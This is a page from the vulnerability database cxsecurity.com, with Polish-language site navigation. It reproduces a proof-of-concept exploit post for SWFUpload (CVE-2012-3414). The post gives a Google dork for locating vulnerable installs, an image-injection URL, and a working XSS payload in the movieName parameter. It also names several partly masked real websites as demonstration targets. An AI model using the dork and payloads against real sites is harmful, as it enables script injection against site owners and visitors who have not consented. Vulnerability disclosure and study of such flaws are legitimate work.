Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
SWFUpload v.ALL <= (Object Injection/CSRF) Vulnerabilities
2013-04-19 / 2013-07-20
Credit:
KedAns-Dz
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2012-3414
CWE:
CWE-352
Ogólna skala CVSS:
4.3/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Brak
### # Title : SWFUpload v.ALL <= (Object Injection/CSRF) Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria # Web Site : www.1337day.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.owasp-dz.org | owasp-dz.org/forum # Type : php - proof of concept - webapp 0day - remote # Tested on : Windows7 (Fr) # Vendor : [http://code.google.com/p/swfupload/] ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! ######## [ Proof / Exploit ] ################|=> # Description : --------------- SWFUpload all versions is suffer from Object (Image) Injection & JavaScript Code injecton (XSRF/XSS) . remote attacker can include a remote Images or exec some JS code. # P.o.C : --------- [1]=> Go to Google and put this dork : inturl:/swfupload/swfupload.swf [2]=> Inject object (image) : http://[site]/[path]/swfupload/swfupload.swf?buttonImageURL=[ + IMG URL + ] http://[site]/[path]/swfupload/swfupload.swf?buttonImageURL=http://1337day.com/img/logo_green.jpg !> Demo's : http://www.chursXmar.com/wp-includes/js/swfupload/swfupload.swf?buttonImageURL=http://1337day.com/img/logo_green.jpg http://www.skiXishing.com/webapp/js/swfupload/swfupload.swf?buttonImageURL=http://1337day.com/img/logo_green.jpg https://mbsanXsurf.com/wp-content/plugins/bp-gallery/inc/js/swfupload/swfupload.swf?buttonImageURL=http://1337day.com/img/logo_green.jpg [3]=> XSRF/XSS Injection : http://[site]/[path]/swfupload/swfupload.swf?movieName=[ + XSS Code + ] http://[site]/[path]/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('HaCked By KedAns-Dz');// !> Demo : http://wwwXXXXie/llcc/wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;//
Referencje:
http://code.google.com/p/swfupload/
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top